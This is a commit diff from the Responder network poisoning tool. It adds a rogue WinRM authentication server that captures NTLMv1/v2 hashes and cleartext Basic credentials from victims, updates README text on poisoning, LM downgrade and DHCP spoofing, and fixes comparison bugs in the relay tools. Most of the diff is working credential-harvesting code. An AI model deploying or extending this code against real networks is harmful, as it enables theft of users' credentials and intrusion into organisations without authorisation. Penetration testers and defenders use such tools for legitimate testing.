Merge branch 'master' of https://github.com/lgandx/Responder

Compare values with `==` instead of `is`

README.md

@@ -10,21 +10,21 @@ Author: Laurent Gaffie <laurent.gaffie@gmail.com >  https://g-laurent.blogspot.c
 
 Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
 
-The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
+The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix. The option -d is also available if you want to poison Domain Service name queries.
 
 ## Features ##
 
 - Built-in SMB Auth server.
 	
-Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
+Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
 
 - Built-in MSSQL Auth server.
 
-In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.
+In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019.
 
 - Built-in HTTP Auth server.
 
-In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
+In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari.
 
 Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.
 
@@ -34,7 +34,11 @@ Same as above. The folder certs/ contains 2 default keys, including a dummy pri
 
 - Built-in LDAP Auth server.
 
-In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
+In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for LDAP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
+
+- Built-in DCE-RPC Auth server.
+
+In order to redirect DCE-RPC Authentication to this tool, you will need to set the option -r and -d (NBT-NS queries for DCE-RPC server lookup are sent using the Workstation and Domain Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019.
 
 - Built-in FTP, POP3, IMAP, SMTP Auth servers.
 
@@ -42,7 +46,7 @@ This modules will collect clear text credentials.
 
 - Built-in DNS server.
 
-This server will answer type A queries. This is really handy when it's combined with ARP spoofing. 
+This server will answer type SRV and A queries. This is really handy when it's combined with ARP spoofing. 
 
 - Built-in WPAD Proxy Server.
 
@@ -66,7 +70,7 @@ For MITM on Windows XP/2003 and earlier Domain members. This attack combined wit
 
     python tools/DHCP.py
 
-DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL.
+DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. To inject a DNS server, domain, route on all Windows version and any linux box, use -R
 
 - Analyze mode.
 
@@ -89,7 +93,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 
 ## Considerations ##
 
-- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.
 
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
 
@@ -176,9 +180,11 @@ Or BTC address:
 
 Late Responder development has been possible because of the donations received from individuals and companies.
 
-We would like to thanks those major donator:
+We would like to thanks those major sponsors:
 
-- SecureWorks : https://www.secureworks.com/
+- SecureWorks: https://www.secureworks.com/
+
+- Synacktiv: https://www.synacktiv.com/
 
 - Black Hills Information Security: http://www.blackhillsinfosec.com/
 
@@ -192,6 +198,12 @@ We would like to thanks those major donator:
 
 Thank you.
 
+## Official Discord Channel
+
+Come hang out on Discord!
+
+[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/sEkn3aa)
+
 ## Copyright ##
 
 NBT-NS/LLMNR Responder

Responder.conf

@@ -14,6 +14,7 @@ HTTPS = On
 DNS = On
 LDAP = On
 DCERPC = On
+WINRM = On
 
 ; Custom challenge. 
 ; Use "Random" for generating a random challenge for each requests (Default)

Responder.py

@@ -262,6 +262,10 @@ def main():
 			from servers.HTTP import HTTP
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
 
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
+
 		if settings.Config.SSL_On_Off:
 			from servers.HTTP import HTTP
 			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))

packets.py

@@ -317,6 +317,21 @@ class IIS_NTLM_Challenge_Ans(Packet):
 	def calculate(self,payload):
 		self.fields["Payload"] = b64encode(payload)
 
+class WinRM_NTLM_Challenge_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 401 \r\n"),
+		("WWWAuth",       "WWW-Authenticate: Negotiate "),
+		("Payload",       ""),
+		("Payload-CRLF",  "\r\n"),
+		("ServerType",    "Server: Microsoft-HTTPAPI/2.0\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+	def calculate(self,payload):
+		self.fields["Payload"] = b64encode(payload)
+
 class IIS_Basic_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
@@ -2128,4 +2143,3 @@ class RPCNTLMNego(Packet):
 
 		self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
 
-

servers/WinRM.py

@@ -0,0 +1,180 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
+from packets import NTLM_Challenge
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans
+from packets import WPADScript, ServeExeFile, ServeHtmlFile
+
+
+# Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data, Challenge, client, module):
+	LMhashLen    = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	
+	NthashLen    = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
+	UserLen      = struct.unpack('<H',data[36:38])[0]
+	UserOffset   = struct.unpack('<H',data[40:42])[0]
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
+	if NthashLen == 24:
+		HostNameLen     = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv1', 
+			'client': client, 
+			'host': HostName, 
+			'user': User, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 24:
+		NthashLen      = 64
+		DomainLen      = struct.unpack('<H',data[28:30])[0]
+		DomainOffset   = struct.unpack('<H',data[32:34])[0]
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
+		HostNameLen    = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv2', 
+			'client': client, 
+			'host': HostName, 
+			'user': Domain + '\\' + User,
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
+			'fullhash': WriteHash,
+		})
+
+# Handle HTTP packet sequence.
+def PacketSequence(data, client, Challenge):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
+
+	if NTLM_Auth or NTLM_Auth2:
+		if NTLM_Auth2:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if NTLM_Auth:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+		if Packet_NTLM == b'\x01':
+			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			if NTLM_Auth2:
+				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+			else:
+				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			if NTLM_Auth2:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			else:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth))
+
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+			Buffer.calculate()
+			return Buffer
+
+	elif Basic_Auth:
+		ClearText_Auth = b64decode(''.join(Basic_Auth))
+
+		SaveToDb({
+			'module': 'WinRM', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
+
+		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+		Buffer.calculate()
+		return Buffer
+	else:
+		if settings.Config.Basic:
+			Response = IIS_Basic_401_Ans()
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending BASIC authentication request to %s" % client))
+
+		else:
+			Response = IIS_Auth_401_Ans()
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending NTLM authentication request to %s" % client))
+
+		return Response
+
+# HTTP Server class
+class WinRM(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
+		except:
+			raise
+			pass
+			

settings.py

@@ -23,7 +23,7 @@ import subprocess
 
 from utils import *
 
-__version__ = 'Responder 3.0.5.0'
+__version__ = 'Responder 3.0.6.0'
 
 class Settings:
 	
@@ -97,6 +97,7 @@ class Settings:
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
 		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
 		self.DCERPC_On_Off      = self.toBool(config.get('Responder Core', 'DCERPC'))
+		self.WinRM_On_Off      = self.toBool(config.get('Responder Core', 'WINRM'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))
 
 		# Db File

tools/MultiRelay.py

@@ -29,7 +29,7 @@ import time
 import random
 import subprocess
 from threading import Thread
-if PY2OR3 is "PY3":
+if PY2OR3 == "PY3":
     from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
 else:
     from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
@@ -159,13 +159,13 @@ Logs = logging
 Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 
 def NetworkSendBufferPython2or3(data):
-    if PY2OR3 is "PY2":
+    if PY2OR3 == "PY2":
         return str(data)
     else:
         return bytes(str(data), 'latin-1')
 
 def NetworkRecvBufferPython2or3(data):
-	if PY2OR3 is "PY2":
+	if PY2OR3 == "PY2":
 		return str(data)
 	else:
 		return str(data.decode('latin-1'))
@@ -446,12 +446,12 @@ class SMBRelay(BaseRequestHandler):
                 data = self.request.recv(4096)
 
             ## Make sure it's not a Kerberos auth.
-            if data.find(b'NTLM') is not -1:
+            if data.find(b'NTLM') != -1:
                 ## Start with nego protocol + session setup negotiate to our target.
                 data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
 
                 ## Make sure it's not a Kerberos auth.
-            if data.find(b'NTLM') is not -1:
+            if data.find(b'NTLM') != -1:
             ##Relay all that to our client.
                 if data[8:10] == b'\x73\x00':
                     head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))

tools/MultiRelay/RelayMultiCore.py

@@ -66,20 +66,20 @@ class Packet():
 
 def StructWithLenPython2or3(endian,data):
 	#Python2...
-	if PY2OR3 is "PY2":
+	if PY2OR3 == "PY2":
 		return struct.pack(endian, data)
 	#Python3...
 	else:
 		return struct.pack(endian, data).decode('latin-1')
 
 def NetworkSendBufferPython2or3(data):
-	if PY2OR3 is "PY2":
+	if PY2OR3 == "PY2":
 		return str(data)
 	else:
 		return bytes(str(data), 'latin-1')
 
 def NetworkRecvBufferPython2or3(data):
-	if PY2OR3 is "PY2":
+	if PY2OR3 == "PY2":
 		return str(data)
 	else:
 		return str(data.decode('latin-1'))

tools/MultiRelay/RelayMultiPackets.py

@@ -45,7 +45,7 @@ else:
 
 def StructWithLenPython2or3(endian,data):
 	#Python2...
-	if PY2OR3 is "PY2":
+	if PY2OR3 == "PY2":
 		return struct.pack(endian, data)
 	#Python3...
 	else:

tools/RunFingerPackets.py

@@ -11,7 +11,7 @@ else:
 
 def StructWithLenPython2or3(endian,data):
     #Python2...
-    if PY2OR3 is "PY2":
+    if PY2OR3 == "PY2":
         return struct.pack(endian, data)
     #Python3...
     else:

tools/SMBFinger/Finger.py

@@ -47,20 +47,20 @@ SMB1 = "Enabled"
 
 def StructWithLenPython2or3(endian,data):
     #Python2...
-    if PY2OR3 is "PY2":
+    if PY2OR3 == "PY2":
         return struct.pack(endian, data)
     #Python3...
     else:
         return struct.pack(endian, data).decode('latin-1')
 
 def NetworkSendBufferPython2or3(data):
-    if PY2OR3 is "PY2":
+    if PY2OR3 == "PY2":
         return str(data)
     else:
         return bytes(str(data), 'latin-1')
 
 def NetworkRecvBufferPython2or3(data):
-    if PY2OR3 is "PY2":
+    if PY2OR3 == "PY2":
         return str(data)
     else:
         return str(data.decode('latin-1'))

utils.py

@@ -387,6 +387,7 @@ def StartupMessage():
 	print('    %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled))
 	print('    %-27s' % "RDP server" + (enabled if settings.Config.RDP_On_Off else disabled))
 	print('    %-27s' % "DCE-RPC server" + (enabled if settings.Config.RDP_On_Off else disabled))
+	print('    %-27s' % "WinRM server" + (enabled if settings.Config.WinRM_On_Off else disabled))
 	print('')
 
 	print(color("[+] ", 2, 1) + "HTTP Options:")